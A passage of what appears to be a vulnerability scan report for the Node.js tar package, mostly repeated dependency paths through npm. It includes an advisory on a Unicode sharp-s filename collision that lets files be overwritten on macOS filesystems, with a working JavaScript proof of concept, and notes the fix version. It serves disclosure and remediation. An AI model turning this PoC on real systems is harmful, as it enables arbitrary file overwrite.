  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
+ +
+ +
+ +

Overview

+

tar is a full-featured Tar for Node.js.

+

Affected versions of this package are vulnerable to Improper Handling of Unicode Encoding in Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS. An attacker can overwrite arbitrary files by exploiting Unicode normalization collisions in filenames within a malicious tar archive on case-insensitive or normalization-insensitive filesystems.

+

Note:

+

This is only exploitable if the system is running on a filesystem such as macOS APFS or HFS+ that ignores Unicode normalization.

+

Workaround

+

This vulnerability can be mitigated by filtering out all SymbolicLink entries when extracting tarball data.

+

PoC

+ 
const tar = require('tar');
+        const fs = require('fs');
+        const path = require('path');
+        const { PassThrough } = require('stream');
+        
+        const exploitDir = path.resolve('race_exploit_dir');
+        if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
+        fs.mkdirSync(exploitDir);
+        
+        console.log('[*] Testing...');
+        console.log(`[*] Extraction target: ${exploitDir}`);
+        
+        // Construct stream
+        const stream = new PassThrough();
+        
+        const contentA = 'A'.repeat(1000);
+        const contentB = 'B'.repeat(1000);
+        
+        // Key 1: "f_ss"
+        const header1 = new tar.Header({
+            path: 'collision_ss',
+            mode: 0o644,
+            size: contentA.length,
+        });
+        header1.encode();
+        
+        // Key 2: "f_ß"
+        const header2 = new tar.Header({
+            path: 'collision_ß',
+            mode: 0o644,
+            size: contentB.length,
+        });
+        header2.encode();
+        
+        // Write to stream
+        stream.write(header1.block);
+        stream.write(contentA);
+        stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding
+        
+        stream.write(header2.block);
+        stream.write(contentB);
+        stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding
+        
+        // End
+        stream.write(Buffer.alloc(1024));
+        stream.end();
+        
+        // Extract
+        const extract = new tar.Unpack({
+            cwd: exploitDir,
+            // Ensure jobs is high enough to allow parallel processing if locks fail
+            jobs: 8 
+        });
+        
+        stream.pipe(extract);
+        
+        extract.on('end', () => {
+            console.log('[*] Extraction complete');
+        
+            // Check what exists
+            const files = fs.readdirSync(exploitDir);
+            console.log('[*] Files in exploit dir:', files);
+            files.forEach(f => {
+                const p = path.join(exploitDir, f);
+                const stat = fs.statSync(p);
+                const content = fs.readFileSync(p, 'utf8');
+                console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
+            });
+        
+            if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
+                console.log('\[*] GOOD');
+            } else {
+                console.log('[-] No collision');
+            }
+        });
+
+

Remediation

+

Upgrade tar to version 7.5.4 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

Directory Traversal

+
+ +
+
+ medium severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Vulnerable module: + + tar +
    • + +
  • Introduced through: + + + lib@*, npm@10.8.2 and others +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
